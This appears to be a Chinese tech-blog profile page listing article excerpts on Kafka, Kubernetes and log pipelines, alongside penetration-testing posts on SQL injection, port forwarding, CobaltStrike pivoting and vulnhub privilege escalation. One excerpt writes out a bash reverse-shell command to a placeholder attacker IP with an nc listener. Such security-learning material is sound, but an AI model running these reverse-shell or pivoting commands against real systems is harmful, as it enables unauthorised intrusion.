- 博客(174)
- 收藏
- 关注
RSS订阅
原创 kafka 命令行 生产消费数据,查看偏移量,修改偏移量
1、Topic相关:创建Topic、删除Topic、查看Topic详细信息、查看Topic列表、修改topic分区数创建Topic创建一个3分区1副本名为test的topic,必须指定分区数 --partitions 和副本数--replication-factor,其中副本数量不能超过kafka节点(broker)数量./kafka-topics.sh --zookeeper localhost:2181 --topic test --partitions 3 --replication-fact
2022-04-18 16:55:30
6771
转载 sql注入之报错注入、堆叠注入、二次注入
报错注入0x00 floor()(8.x>mysql>5.0)[双查询报错注入]函数返回小于或等于指定值(value)的最小整数,取整通过floor报错的方法来爆数据的本质是group by语句的报错。group by语句报错的原因是floor(random(0)*2)的不确定性,即可能为0也可能为1group by key的原理是循环读取数据的每一行,将结果保存于临时表中。读取每一行的key时,如果key存在于临时表中,则不在临时表中更新临时表中的数据;如果该key不存在于临时表中,则
2021-12-15 13:03:23
621
转载 端口转发与端口映射
端口转发定义顾名思义,就是将端口进行转发,具体哪个端口转发到哪个端口要以应用场景为准,比如我们拿到一台内网服务器A的权限,通过扫描发现了同内网的另一台服务器B且开了80端口,我们该如何使用浏览器访问它呢?我们画一个图如下:从上图中可以看到,我们已经与A建立了通道,我们可以在A上上传任意文件,执行任意的系统命令,我们如何能够访问B的80端口?假设A是在公网上,有公网IP,我们可以访问它的任意端口。1、直接在A上执行curl命令访问B的80端口(这种方式不方便我们测试B的80端口的漏洞,不方便利用)2
2021-11-11 20:03:15
4426
转载 反弹shell的N种姿势
前言在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。0x01 Bash反弹1.1 方法一击者主机上执行监听:nc -lvvp port目标主机上执行:bash -i >& /dev/tcp/x.x.x.x/port 0>&1#bash -i 打开一个交互的bash#>
2021-11-06 22:59:36
336
原创 路由代理(msf、CobaltStrike)与内网渗透
kali:192.168.239.0/24win7:192.168.239.0/24 192.168.52.0/24win2003:192.168.52.0/24win2008:192.168.52.0/24CobaltStrike代理开启CobaltStrike在命令行中输入socks 22通过火狐浏览器安装proxy扩展插件,并设定socks代理,配置完成以后,便可以成功访问到内网主机192.168.52.0/24的web应用,相关配置如下所示:之后便可以访问内网也可以用用
2021-08-12 21:45:12
2390
转载 kali linux 中python2不带pip的解决方法
在使用kali2020版本时,发现pip只能安装python3的模块,没办法安装python2模块,但是我有需要用到python2来运行脚本,在此贴出解决办法https://bootstrap.pypa.io/pip/2.6/get-pip.pysupython2 get-pip.py报错就再运行一次,一般是因为网速不行报错安装后通常提示pip版本过低,要升级然后使用命令进行版本升级pip2 install --upgrade pip 版本升级后安装包时通常还会出错,例如error:
2021-05-14 18:55:12
1966
2
转载 python中的[1:]、[::-1]、X[:,m:n]和X[1,:]
https://www.pianshen.com/article/30851737431/
2021-04-06 23:57:23
255
原创 部署kubevirt教程
运行kubevirt-operator.yaml会出现告警:Warning: Detected changes to resource kubevirts.kubevirt.io which is currently being deleted.注意:如果您错误地首先删除了运算符,KV自定义资源将卡在Terminating状态,要修复它,请从资源中手动删除终结器。运行kubevirt-operator.yaml出现,链接不到kubevirt-operator-webhook。【所有节点全部安装】
2023-11-06 17:51:49
392
原创 minikube创建一个pod并暴露端口(使用docker驱动安装)
因为minikube使用service暴露端口是使用nodeIP:nodePort 而不是 localhost:nodePort 公开访问。我们只能使用kubectl的端口转发功能或者使用iptables的转发功能来实现外网服务暴露。我这里使用shiro来举例通过yaml文件可以看到监听得端口号为8080,【经过测试,不需要将类型改为NodePort】使用kubectl的端口转发功能最终浏览器访问,http://localhost:20080,成功访问到页面。
2023-10-19 17:00:05
613
原创 vulnhub之MATRIX-BREAKOUT 2 MORPHEUS
任意文件读取漏洞、文件写入漏洞,CVE-2022-0847(DirtyPipe漏洞提权)
2023-10-17 14:25:26
352
原创 利用logstash/filebeat/插件,将graylog日志传输到kafka中
在System-outputs,选择GELF Output,填写如下内容,其它选项默认。也可以使用filebeat将日志转发到kafka中,原理一样。在要输出的Stream中,选择Manage Outputs。选择GELF Output,右边选择刚才创建好的test。上传到服务器,编写test.conf配置文件,内容如下。下载logstash,最新版就可以。运行logstash,输入以下命令。前提:安装好kafka集群,最终消息传递到kafka上。
2023-08-11 21:31:46
1696
原创 局域网中使用chrony使得Linux集群时间同步
两台主机:192.168.239.141(服务器)、192.168.239.142(客户端)修改配置文件(服务器)vim /etc/chrony.conf。修改客户端:192.168.239.142。
2023-07-29 00:50:04
257
原创 vulnhub靶场之Black-Widow-final
将一句话木马写入日志,并配合文件读取漏洞Getshell;Capabilities(perl)提权
2023-05-02 17:48:23
974
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人